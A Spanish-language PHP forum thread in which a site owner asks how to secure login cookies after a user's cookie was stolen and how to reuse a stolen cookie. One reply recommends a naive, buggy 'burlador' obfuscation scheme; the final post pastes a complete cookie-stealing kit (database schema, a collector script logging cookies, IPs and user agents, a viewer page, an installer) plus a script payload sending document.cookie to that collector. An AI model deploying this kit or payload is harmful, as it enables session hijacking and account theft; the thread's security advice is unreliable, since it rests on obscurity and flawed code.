Foros del Web » Programando para Internet » PHP »

Me robaron el cookie...

Estas en el tema de Me robaron el cookie... en el foro de PHP en Foros del Web. a un usuario mio le robaron el cookie, entonces... estoy tratando de hacer un codigo seguro para las cookies, osea el codigo de la cookie ...
  #1 (permalink)  
Antiguo 30/07/2008, 08:11
Avatar de farra  
Fecha de Ingreso: marzo-2008
Ubicación: Aqui estoy
Mensajes: 574
Antigüedad: 16 años, 1 mes
Puntos: 20
Pregunta Me robaron el cookie...

a un usuario mio le robaron el cookie, entonces...

estoy tratando de hacer un codigo seguro para las cookies, osea el codigo de la cookie que sean el Id + el Pass + palabrasecreta y el IP.. todo concatenado y luego a ese resultado lo encripto con un codigo que creee y me genera un codigo encriptado que despues cuando va a loguear compara con los datos de la base de datos...

ej: ?Id=342&Cod=a4309sdfjlk234j50s9d7n5l2sd098

$datos=encripta($id,$pass,$IP);

if($datos == $_GET['Cod']){
echo "OK";
}else{
echo "ERROR";
}

puse GET para que se entienda mejor, pero en realidad la variable es cookie...

osea busca en la bd el id 342 luego extrae los datos que necesita y los somete al proceso de encriptado y compara que el codigo generado sea el mismo de la cookie...

supon que un usuario te roba el cookie? en caso de no tener en cuenta el IP puede iniciar sesion con esa cookie, pero si en el proceso de encriptado tiene en cuenta el IP no...

es correcto eso? que problemas podria tener?


y otra pregunta... como lo hiso? estube intentando reproducir la tecnica para tratar de auto-hackear mi sistema y asi ir implementando seguridades a medida que le encuentro fallas, pero hasta ahora sin exito...

supon que robe la cookie de un usuario.. ahora como hago para iniciar sesion con la cuenta del usuario el cual tengo la cookie...?
__________________
Firma:
Es mas dificil para el mono entender que el hombre desciende de el....

PD: Siempre doy karma al que me da una buena respuesta... ;0)
  #2 (permalink)  
Antiguo 30/07/2008, 08:23
Avatar de pateketrueke
Modernizr
 
Fecha de Ingreso: abril-2008
Ubicación: Mexihco-Tenochtitlan
Mensajes: 26.399
Antigüedad: 16 años
Puntos: 2534
Respuesta: Me robaron el cookie...

yo pienso, que el detalle esta en la forma en que guardas la cookie.... como era el dato??

algunos acostumbran, conservar incluso... la contraseña en la cookie, y eso esta mal.... de echo, muy mal!

por eso, es mejor usar sesiones... o un sistema propio que se quede en el servidor... y no pueda ser atacado por un usuario, suerte!
__________________
Y U NO RTFM? щ(ºдºщ)

No atiendo por MP nada que no sea personal.
  #3 (permalink)  
Antiguo 30/07/2008, 11:25
Avatar de farra  
Fecha de Ingreso: marzo-2008
Ubicación: Aqui estoy
Mensajes: 574
Antigüedad: 16 años, 1 mes
Puntos: 20
Respuesta: Me robaron el cookie...

sip, obvio que es mejor sesiones pero te cargan mucho el servidor....
por eso quiero crear un cookie seguro y queria auto-hackear mi sistema para ir viendo sus falencias y asi poniendole nuevas trabas de seguridad..

pero para mi desdicha no he podido auto-hackearme... :(

Mi pregunta era:
supon que robe la cookie de un usuario.. ahora como hago para iniciar sesion con la cuenta del usuario el cual tengo la cookie...?

desde ya agradesco las respuestas...


PD:voy a dar karma al que me de la mejor respuesta... ;0)
__________________
Firma:
Es mas dificil para el mono entender que el hombre desciende de el....

PD: Siempre doy karma al que me da una buena respuesta... ;0)
  #4 (permalink)  
Antiguo 30/07/2008, 11:39
 
Fecha de Ingreso: junio-2006
Ubicación: Jáltipan Veracruz, México
Mensajes: 150
Antigüedad: 17 años, 10 meses
Puntos: 1
Respuesta: Me robaron el cookie...

Las cookies son buenas, para acelerar el proceso, pero no es recomendable que guardes datos de seguridad y menos de los usuarios, no es necesario robarse las cookies, las páginas reconocen sus galletas y las reactivan, es mejor usar sesiones u otro mecanismos como la modificación del .htacces, es cierto, generan carga de trabajo en tu server, pero le das más seguridad al usuario, ahora que si quieres, usa cabeceras de login y las almacenas en tu base de datos, al fin y al cabo tienes que accesar a la base y el tiempo en las consultas con pocos campos no consume mucho recurso.
__________________
" La vida es un programa que no hemos logrado depurar."
"El programar tu vida es como si le metieras más errores a tu futuro, el proceso es ahora"
  #5 (permalink)  
Antiguo 30/07/2008, 11:47
Avatar de enlinea777  
Fecha de Ingreso: mayo-2008
Ubicación: frente al pc
Mensajes: 1.830
Antigüedad: 15 años, 11 meses
Puntos: 127
burlador

ok mira
para poder robar la cookie tienes que tener un buen explorer yo recomiento firefox pues con el despues puedes ponerte a editar las cookies.
no lo voy a decir por que seria tonto darle a los crackernovatos las herramientas para hakear pero si te puedo decir que para evitar eso hagas esto.
no pongas el password jamas en las cookies ni encrptados por que hay tecnicas para desencriptarlos, reomiendo poner un burlador.
que es un burlador pues es esto.
digamos que tu pass es maria ok
pues pones en php esto:

Código PHP:
//aplicas el burlador
$pass="maria";
if(
pass=="maria"){
$pass='igjadfslñkgjdfkgljdfahñlkjdfhlkbjfdobijfdbp{jfobjdfbbfdlbad{fbñl'//codigo escrito al asar pasando las manos por el teclado apretando lo que sea
}
//aplicas la cookie
setcookie("accsesocoockie",$passtime()+900);//le colocas un tiempo determinado a la cookie para que no se guarde para siempre en este caso 15 minutos 
para consultar luego haces esto:

Código PHP:
//recuperas la cookie
$accsesocoockie=$_COOKIE["pass"];
//si la cookie es igual a tu burlador le pones la pass
if($accsesocoockie=='igjadfslñkgjdfkgljdfahñlkjdfhlkbjfdobijfdbp{jfobjdfbbfdlbad{fbñl'){
$accsesocoockie="maria";

es mejor encriptar a mano asi nadie sabra como lo iciste y no tendra un patron para desencriptarlo ok
  #6 (permalink)  
Antiguo 30/07/2008, 11:57
Avatar de farra  
Fecha de Ingreso: marzo-2008
Ubicación: Aqui estoy
Mensajes: 574
Antigüedad: 16 años, 1 mes
Puntos: 20
Respuesta: Me robaron el cookie...

Codigo para robar Cookies:


SQL.txt (se instala en el phpmyadmin)
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code>
CREATE TABLE `cookies` (
`id` int(10) NOT NULL auto_increment,
`txtcookie` text NOT NULL,
`ip` text NOT NULL,
`agent` text NOT NULL,
PRIMARY KEY (`id`)
) TYPE=MyISAM;

INSERT INTO `cookies` VALUES (1, '5sS$t3st|ng5Sss', '127.0.0.1', 'Windogs');
</TD></TR></TBODY></TABLE>

config.php
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code>
<?php

$dbhost = "localhost";
$dbuser = "root";
$dbpass = "";
$db = "ecker";

@$cxn = mysql_connect($dbhost, $dbuser, $dbpass);
@mysql_select_db($db, $cxn);

?>
</TD></TR></TBODY></TABLE>

cookie.php
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php

/*
* first you must send cookie to script, it goes something like this:
* Code:
*
* [Solo los usuarios registrados pueden acceder a los links. ]
*
* in cookie.php there should be something like this:
* Code:
* <script>document.location='http://localhost/cookie.php?cookie='+window.document.cookie;</script>
*/

$cookie = $_GET['cookie'];
$REMOTE_ADDR = $_SERVER['REMOTE_ADDR'];
$HTTP_USER_AGENT = $_SERVER['HTTP_USER_AGENT'];

include("config.php");

mysql_query("insert INTO `cookies` (txtcookie, ip, agent) values ('$cookie', '$REMOTE_ADDR', '$HTTP_USER_AGENT')");

# si no quieres utilizar una base de datos borra los gatitos de abajo (linea 24 y 25) y coloca otro gatito (#) en la linea 21
# $fp = fopen("cookies.txt", "a+");
# fwrite($fp, $cookie);

?>
</TD></TR></TBODY></TABLE>

db.php (aqui se guardan llas cookies)
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php

require("config.php");

$sql = "SELECT * FROM cookies ORDER by id DESC";
$query = mysql_query($sql);
$design = 0;

echo "<table border=\"0\" cellspacing=\"1\" cellpadding=\"2\" width=\"100%\" style=\"border-top:solid black .5pt; border-left:solid black .5pt; border-bottom:solid black .5pt; border-right:solid black .5pt;\">";
echo " <tr>";
echo " <td><font color=black><b>#</b></font></td>";
echo " <td><font color=black><b>Cookie</b></font></td>";
echo " <td><font color=black><b>IP</b></font></td>";
echo " <td><font color=black><b>HTTP user agent</b></font></td>";
echo " </tr>";

while ($row = mysql_fetch_array($query)) {
if ($design == 0) {
$color = '#F7F7F7'; # row color
$design++;
}
else {
$color = '#FFFFFF'; # row color 2
$design = 0;
}
$row[id] = htmlentities($row[id]);
$row[txtcookie] = htmlentities($row[txtcookie]);
$row[ip] = htmlentities($row[ip]);
$row[agent] = htmlentities($row[agent]);
echo " <tr>";
echo " <td bgcolor='$color'>".$row['id']."</td>";
echo " <td bgcolor='$color'>".$row['txtcookie']."</td>";
echo " <td bgcolor='$color'>".$row['ip']."</td>";
echo " <td bgcolor='$color'>".$row['agent']."</td>";
echo " </tr>";
}

echo "</table>";

mysql_free_result($query);
mysql_close($cxn);


?></TD></TR></TBODY></TABLE>

install.php (opcional)
Si te da flojera abrir tu phpmyadmin e instalar SQL.txt ejecuta este archivo. Posteriormente elimina este archivo.
<TABLE cellSpacing=1 cellPadding=3 width="90%" align=center border=0><TBODY><TR><TD>Código:</TD></TR><TR><TD class=code><?php

require("config.php");


if(!$cxn) {
die("Error al conectar a la base de datos.");
} else {
mysql_query("CREATE TABLE cookies (id int(10) NOT NULL auto_increment,txtcookie text NOT NULL,ip text NOT NULL,agent text NOT NULL,PRIMARY KEY (id)) TYPE=MyISAM;");
mysql_query("INSERT INTO cookies VALUES (1, '5sS$t3st|ng5Sss', '127.0.0.1', 'Windogs');");
echo "La instalacion fue todo un exito. Borra de tu servidor el archivo install.php";
}

mysql_close($cxn);

?></TD></TR></TBODY></TABLE>


bue.. ese es un codigo para robar cookies... eso en google buscas y hay a patadas...

pero una ves que tenes la cookie como la usas? eso es lo que quiero saber asi parto de ahi para ir probando la seguridad de mi sistema.....
__________________
Firma:
Es mas dificil para el mono entender que el hombre desciende de el....

PD: Siempre doy karma al que me da una buena respuesta... ;0)
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 09:24.